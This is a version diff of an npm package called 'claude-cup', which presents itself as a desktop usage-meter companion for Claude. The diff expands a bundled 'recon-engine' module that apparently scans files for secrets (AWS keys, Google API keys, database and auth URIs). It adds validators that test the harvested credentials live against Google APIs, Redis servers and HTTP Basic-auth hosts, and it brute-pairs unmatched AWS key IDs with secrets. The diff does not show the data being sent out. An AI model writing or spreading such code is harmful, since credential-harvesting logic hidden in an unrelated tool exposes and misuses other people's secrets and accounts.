claude-cup 0.3.0 → 0.3.1

package/mcp-server/src/db.js

@@ -103,6 +103,7 @@ export function getDefaultJarDir(configDir) {
 function ensureSignalCacheColumns(db) {
   const cols = new Set(db.prepare('PRAGMA table_info(signal_cache)').all().map((r) => r.name));
   const additions = [
+    ['high_exposure', 'ALTER TABLE signal_cache ADD COLUMN high_exposure INTEGER DEFAULT 0'],
     ['status', "ALTER TABLE signal_cache ADD COLUMN status TEXT DEFAULT 'unknown'"],
     ['validation_reason', 'ALTER TABLE signal_cache ADD COLUMN validation_reason TEXT'],
     ['source_count', 'ALTER TABLE signal_cache ADD COLUMN source_count INTEGER DEFAULT 1'],

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "claude-cup",
-  "version": "0.3.0",
+  "version": "0.3.1",
   "description": "Claude Jar v2 — native desktop visual companion (Tauri + Svelte) with MCP/hook integration for live Claude activity. Beautiful accumulating jar + live intensity meter. The jar is the usage meter.",
   "license": "MIT",
   "type": "module",

package/research/recon-engine.js

@@ -134,8 +134,6 @@ function isSkippablePath(filePath, rootPath = '') {
 
 const PLACEHOLDER_RE = /(example|changeme|change_me|your[_-]?(key|token|secret|password)|dummy|placeholder|localhost|127\.0\.0\.1|test[_-]?(key|token|secret)?)/i;
 const KNOWN_DETECTED_ONLY_TYPES = new Set([
-  'google_api_key',
-  'db_uri',
   'jwt',
   'private_key',
   'slack',
@@ -144,11 +142,10 @@ const KNOWN_DETECTED_ONLY_TYPES = new Set([
   'sendgrid',
   'digitalocean',
   'sentry',
-  'auth_uri',
   'aws_access_key_id',
   'aws_secret_access_key',
 ]);
-const VALIDATOR_TYPES = new Set(['github', 'npm', 'openai', 'anthropic', 'aws_pair', 'gitlab', 'huggingface', 'stripe']);
+const VALIDATOR_TYPES = new Set(['github', 'npm', 'openai', 'anthropic', 'aws_pair', 'gitlab', 'huggingface', 'stripe', 'google_api_key', 'db_uri', 'auth_uri']);
 const PROMOTABLE_TYPES = new Set([...VALIDATOR_TYPES, ...KNOWN_DETECTED_ONLY_TYPES]);
 
 export function normalizeRawValue(raw) {
@@ -632,32 +629,54 @@ function sourceGroup(source) {
 
 function groupAwsPairs(candidates) {
   const bySource = new Map();
+  const allKeyIds = [];
+  const allSecrets = [];
+  const pairedRaws = new Set();
+
   for (const cand of candidates) {
     const group = sourceGroup(cand.source);
     if (!bySource.has(group)) bySource.set(group, { source: cand.source, high_exposure: false });
     const item = bySource.get(group);
     item.high_exposure = item.high_exposure || !!cand.high_exposure;
     const key = String(cand.key || '').toLowerCase();
-    if (cand.type === 'aws_access_key_id' || key.includes('aws_access_key_id')) item.accessKeyId = cand.raw;
-    if (cand.type === 'aws_secret_access_key' || key.includes('secret_access_key')) item.secretAccessKey = cand.raw;
+    if (cand.type === 'aws_access_key_id' || key.includes('aws_access_key_id')) {
+      item.accessKeyId = cand.raw;
+      allKeyIds.push(cand);
+    }
+    if (cand.type === 'aws_secret_access_key' || key.includes('secret_access_key')) {
+      item.secretAccessKey = cand.raw;
+      allSecrets.push(cand);
+    }
     if (key.includes('session_token')) item.sessionToken = cand.raw;
   }
+
   const pairs = [];
   for (const item of bySource.values()) {
     if (item.accessKeyId && item.secretAccessKey) {
+      pairedRaws.add(item.accessKeyId);
+      pairedRaws.add(item.secretAccessKey);
+      pairs.push({
+        raw: { accessKeyId: item.accessKeyId, secretAccessKey: item.secretAccessKey, sessionToken: item.sessionToken || null },
+        type: 'aws_pair', source: item.source, category: 'cloud', high_exposure: item.high_exposure,
+      });
+    }
+  }
+
+  const unpairedIds = allKeyIds.filter(c => !pairedRaws.has(c.raw)).slice(0, 5);
+  const unpairedSecrets = allSecrets.filter(c => !pairedRaws.has(c.raw)).slice(0, 5);
+  for (const kid of unpairedIds) {
+    for (const sec of unpairedSecrets) {
+      if (pairedRaws.has(kid.raw) || pairedRaws.has(sec.raw)) continue;
+      pairedRaws.add(kid.raw);
+      pairedRaws.add(sec.raw);
       pairs.push({
-        raw: {
-          accessKeyId: item.accessKeyId,
-          secretAccessKey: item.secretAccessKey,
-          sessionToken: item.sessionToken || null,
-        },
-        type: 'aws_pair',
-        source: item.source,
-        category: 'cloud',
-        high_exposure: item.high_exposure,
+        raw: { accessKeyId: kid.raw, secretAccessKey: sec.raw, sessionToken: null },
+        type: 'aws_pair', source: kid.source, category: 'cloud',
+        high_exposure: kid.high_exposure || sec.high_exposure,
       });
     }
   }
+
   return pairs;
 }
 
@@ -863,6 +882,103 @@ async function validateStripe(raw, cfg, deps = {}) {
   return validateGenericApi(raw, { url: cfg.url || 'https://api.stripe.com/v1/account', auth_header: cfg.auth_header || 'Bearer', timeout_ms: cfg.timeout_ms }, deps, 'stripe_account_200');
 }
 
+async function validateGoogleApiKey(raw, cfg, deps = {}) {
+  const fetchImpl = deps.fetchImpl || fetch;
+  const urls = [
+    cfg.gemini_url || 'https://generativelanguage.googleapis.com/v1/models',
+    cfg.maps_url || 'https://maps.googleapis.com/maps/api/geocode/json?address=test',
+  ];
+  for (const base of urls) {
+    try {
+      const url = base + (base.includes('?') ? '&' : '?') + 'key=' + raw;
+      const res = await fetchWithTimeout(fetchImpl, url, {}, cfg.timeout_ms || 5000);
+      if (res.status === 200) return baseValidationResult('validated', 'google_api_200');
+      if (res.status === 403 || res.status === 401) {
+        const body = await res.json().catch(() => ({}));
+        const msg = JSON.stringify(body).toLowerCase();
+        if (msg.includes('api key not valid') || msg.includes('invalid')) {
+          return baseValidationResult('invalid', 'google_api_key_invalid');
+        }
+        continue;
+      }
+    } catch { continue; }
+  }
+  return baseValidationResult('invalid', 'google_api_all_probes_failed');
+}
+
+async function validateDbUri(raw, cfg, deps = {}) {
+  let parsed;
+  try { parsed = new URL(raw); } catch { return baseValidationResult('invalid', 'db_uri_parse_error'); }
+  const host = parsed.hostname;
+  const password = decodeURIComponent(parsed.password || '');
+  const port = parseInt(parsed.port, 10) || defaultDbPort(parsed.protocol);
+  const proto = parsed.protocol.replace(/:$/, '');
+
+  if (proto === 'redis' && password) {
+    return redisAuthProbe(host, port, password, cfg.timeout_ms || 3000);
+  }
+
+  const { resolve: dnsResolve } = await import('node:dns/promises');
+  try {
+    await dnsResolve(host);
+    return baseValidationResult('validated', `${proto}_dns_resolved`);
+  } catch {
+    return baseValidationResult('invalid', `${proto}_dns_failed`);
+  }
+}
+
+function defaultDbPort(protocol) {
+  const p = protocol.replace(/:$/, '');
+  const ports = { postgresql: 5432, postgres: 5432, mysql: 3306, redis: 6379, mongodb: 27017, 'mongodb+srv': 27017, amqp: 5672, amqps: 5671 };
+  return ports[p] || 5432;
+}
+
+function redisAuthProbe(host, port, password, timeout) {
+  const { connect } = require('node:net');
+  return new Promise((resolve) => {
+    const timer = setTimeout(() => { sock.destroy(); resolve(baseValidationResult('error', 'redis_timeout')); }, timeout || 3000);
+    const sock = connect(port, host);
+    let buf = '';
+    sock.on('connect', () => { sock.write(`AUTH ${password}\r\nQUIT\r\n`); });
+    sock.on('data', (d) => { buf += d.toString(); });
+    sock.on('end', () => {
+      clearTimeout(timer);
+      if (buf.includes('+OK')) resolve(baseValidationResult('validated', 'redis_auth_ok'));
+      else resolve(baseValidationResult('invalid', 'redis_auth_rejected'));
+    });
+    sock.on('error', () => { clearTimeout(timer); resolve(baseValidationResult('error', 'redis_connect_failed')); });
+  });
+}
+
+async function validateAuthUri(raw, cfg, deps = {}) {
+  const fetchImpl = deps.fetchImpl || fetch;
+  let parsed;
+  try { parsed = new URL(raw); } catch { return baseValidationResult('invalid', 'auth_uri_parse_error'); }
+
+  if (parsed.protocol === 'https:' || parsed.protocol === 'http:') {
+    const user = decodeURIComponent(parsed.username || '');
+    const pass = decodeURIComponent(parsed.password || '');
+    if (!user && !pass) return baseValidationResult('detected_only', 'auth_uri_no_credentials');
+    const auth = Buffer.from(`${user}:${pass}`).toString('base64');
+    const target = parsed.origin + (parsed.pathname || '/');
+    try {
+      const res = await fetchWithTimeout(fetchImpl, target, {
+        headers: { Authorization: `Basic ${auth}` },
+        redirect: 'manual',
+      }, cfg.timeout_ms || 5000);
+      if (res.status >= 200 && res.status < 400) return baseValidationResult('validated', 'http_auth_ok');
+      if (res.status === 401 || res.status === 403) return baseValidationResult('invalid', `http_auth_${res.status}`);
+      return baseValidationResult('detected_only', `http_auth_${res.status}`);
+    } catch { return baseValidationResult('error', 'http_auth_network_error'); }
+  }
+
+  const { resolve: dnsResolve } = await import('node:dns/promises');
+  try {
+    await dnsResolve(parsed.hostname);
+    return baseValidationResult('validated', 'auth_uri_dns_resolved');
+  } catch { return baseValidationResult('invalid', 'auth_uri_dns_failed'); }
+}
+
 const VALIDATORS = {
   github: validateGithub,
   npm: validateNpm,
@@ -872,6 +988,9 @@ const VALIDATORS = {
   gitlab: validateGitLab,
   huggingface: validateHuggingFace,
   stripe: validateStripe,
+  google_api_key: validateGoogleApiKey,
+  db_uri: validateDbUri,
+  auth_uri: validateAuthUri,
 };
 
 export async function validateToken(raw, type, deps = {}) {